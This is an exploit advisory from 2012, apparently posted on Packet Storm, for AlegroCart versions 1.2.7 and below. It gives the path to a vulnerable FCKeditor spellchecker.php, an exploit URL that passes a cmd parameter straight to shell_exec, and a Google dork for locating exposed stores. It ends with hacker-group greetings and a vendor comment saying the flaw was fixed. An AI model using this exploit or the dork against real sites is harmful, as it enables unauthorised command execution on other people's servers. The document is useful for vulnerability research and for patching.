AlegroCart versions 1.2.7 and below suffer from a remote command execution vulnerability.
ff36a9c481655e3e71f4262115e0c0f2#### # Exploit Title: AlegroCart <= 1.2.7 (spellchecker.php) Remote Command Execution Vulnerability
# Author: T0x!c
# Date: 22/02/2012
# Facebook Page: www.facebook.com/DzTem
# E-mail: Malik_99@hotmail.fr
# Category:: webapps
# Google Dork: intext:" Powered by AlegroCart Your Store Name © 2012"
# Vendor: http://forum.alegrocart.com/viewtopic.php?f=8&t=570
# Version: 1.2.7
# Tested on: [Windows Xp]
####
# Exploit : admin/javascript/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
http://localhost/Path/admin/javascript/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php?cmd=[your command]
http://127.0.0.1/Path/admin/javascript/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php?cmd=[your command]
shell_exec( $cmd )) {
line : 102
=================================**Algerians Hackers**=======================================
# Greets To : KedAns-Dz * Caddy-Dz * Kha&miX * Jago-dz * Kader11000 * Kalashinkov * Over-x
(exploit-id.com) , (1337day.com) , (h4ckforu.com) , (alboraaq.com) (Dz-Team.biz) =============================================================================================
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments (1)
This was corrected with upgrade to ckeditor.
code.google.com/p/alegrocart/source…
Again, thank you for your concern.
AlegroCart Team
2012-02-23 17:22:36 UTC | Permalink | Reply